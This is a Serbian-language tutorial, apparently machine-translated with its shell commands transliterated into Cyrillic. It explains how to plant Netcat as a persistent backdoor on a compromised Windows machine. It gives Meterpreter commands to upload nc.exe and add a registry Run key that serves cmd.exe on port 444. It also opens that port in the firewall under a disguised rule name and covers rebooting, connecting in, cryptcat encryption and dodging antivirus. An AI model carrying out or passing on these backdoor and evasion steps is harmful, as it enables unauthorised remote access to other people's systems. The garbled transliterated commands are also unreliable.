Phenquestions
Увод:
Нетцат је мрежни услужни програм који може читати и писати и на УДП и на ТЦП портове. Често се назива швицарским ножем хакерских алата, јер може учинити неколико ствари и као клијент и као сервер током хакерских авантура. Често ћемо га користити за стварање везаних и обрнутих поклопаца шкољки око извештаја да бисмо видели шта се дешава и слали датотеке између машина. Схелл је начин на који можете комуницирати са рачунаром попут командне линије у систему Виндовс или терминала у Линуку. Нетцат нам омогућава да изводимо много ствари попут обрнутих полица, да комуницирамо између два или више рачунара и омогућиће вам да обављате мноштво функција. Нетцат може скенирати порт и повезати се са отвореним портовима користећи једноставне командне аргументе. Такође је способан за слање датотека и пружање даљинске администрације било директном или обрнутом љуском.
Запошљавање Нетцата као сталног агента:
Нетцат је изузетно свестран и користан програм. Раније сам у овом чланку споменуо да се користи за комуникацију између два рачунара. Такође се може користити ако желите да инсталирате постојаност. Нетцат се може користити као бацкдоор. Па кренимо са стварањем постојане љуске на угроженом систему помоћу Нетцат-а. Користићемо -нц.еке, како је име извршне датотеке. Али ако га преименујете пре употребе, смањује шансе за откривање. Међутим, чак и након преименовања антивирусни софтвер га може открити. Много хакера мења неке елементе Нетцат-овог изворног кода, који су непотребни и, пре него што га употребе, прекомпајлирају. Ове промене ће Нетцат учинити невидљивим за антивирусни софтвер.
На Кали, Нетцат се чува у / уср / схаре / виндовс-бинариес. Да бисте га учитали на компромитовани систем, користите наредбу из мерача:
$ метерпретер> уплоад / уср / схаре / виндовс-бинариес / нц.еке Ц: \\ ВИНДОВС \\ систем32
У овој фасцикли постоји пуно типова датотека, најбоље је сакрити датотеку у угроженом систему
Такође можете да користите протокол за пренос датотека Тривиал ако немате везу мерача за пренос датотеке.
Следећи корак је конфигурисање регистра тако да можете покренути Нетцат када се систем покрене и уверите се да слуша на порту 444. Користите доњу наредбу:
$ метерпретер> рег сетвал -к ХКЛМ \\ софтвер \\ мицрософт \\ виндовс \\тренутна верзија \\ покрени -вв нц -д 'Ц: \\ виндовс \\ систем32 \\ нц.еке -Лдп 444
-е цмд.еке '
Сада када сте користили горе поменуту команду, користите следећу команду за упит како бисте били сигурни да је примена промене у регистру успешна.
$ метерпретер> рег куеривал -кХКЛМ \\ софтваре \\ мицрософт \\ виндовс \\цуррентверион \\ покрени -вв нц
Отворите порт на локалном заштитном зиду да бисте потврдили да ће угрожени систем прихватити даљинске везе са Нетцатом помоћу команде $ нетсх. Знање оперативног система циља има главну важност. Контекст наредбеног ретка који се користи за Виндовс Виста, Виндовс Сервер 2008 је
$ нетсх адвфиреваллЗа раније системе користи се наредба $ нетсх фиревалл. Унесите наредбу љуске у промптру метерпретер да бисте додали порт у локални Виндовс заштитни зид, унесите правило помоћу одговарајуће наредбе. За правилно функционисање система, корисничко име попут 'свцхостпасстхроугх' док именујете правило. Пример наредбе је приказан на следећи начин:
$ Ц: \ Виндовс \ систем32> нетсх заштитни зид додаје отварање портаТЦП 444 „пролаз кроз услугу“
Да бисте потврдили да је промена успешно спроведена помоћу следеће наредбе:
$ Ц: \ виндовс \ систем32> нетсх заштитни зид приказује отварање порта
Након потврде правила порта, уверите се да опција поновног покретања ради.
Унесите следећу наредбу из одзивника метерпретер:
$ метерпретер> ребоотУнесите следећу наредбу из интерактивне Виндовс љуске:
$ Ц: \ виндовс \ систем32> схутдовн -р -т 00Да бисте даљински приступили угроженом систему, откуцајте $ нц у командној линији, назначите опширност везе (-в и -вв извештавају основне информације, много више информација), а затим унесите ИП адресу циља и број порта.
$ нц -в 192.168.43.128 444
Нажалост, Нетцат има одређена ограничења, тј. Не постоји потврда идентитета пренетих података, а антивирусни софтвер то може открити. Међутим, проблем мањег шифровања може се решити коришћењем цриптцат-а, који је алтернатива Нетцат-у. Током преноса између искоришћеног хоста и нападача, он осигурава податке помоћу шифрирања Твофисх. Неће бити погрешно рећи да пружа разумно снажну заштиту шифрованих података.
Уверите се да је прислушкивач спреман и конфигурисан са јаком лозинком за употребу цриптцат, користите следећу наредбу:
$ судо цриптцат -к лозинка -л -п 444Следећи корак је отпремање цриптцат-а у угрожени систем и конфигурисање да се повеже са ИП адресом слушаоца помоћу следеће наредбе:
$ Ц: \ цриптцат -к лозинкаЖалосно је рећи да Нетцат и његове варијанте могу открити антивирусни софтвер. Коришћењем хек уређивача за измену изворног кода Нетцат-а постоји могућност да Нетцат остане неоткривен. Али то је дуг поступак покушаја и грешака. Поузданији приступ је употреба механизама постојаности Метасплоит Фрамеворк-а.
Закључак:
НЕТЦАТ је швајцарски војни нож који се користи за ефикасно хаковање. Може да обавља неколико функција за приступ серверу и клијенту. Овај чланак вам даје кратак опис функције и употребе НЕТЦАТ-а. Надам се да вам се свидело ако вам је овај чланак помогао да га поделите са пријатељима. Слободно питајте о свим питањима која имате у вези са НЕТЦАТ-ом. Такође можете поделити своје мишљење и додатне детаље.
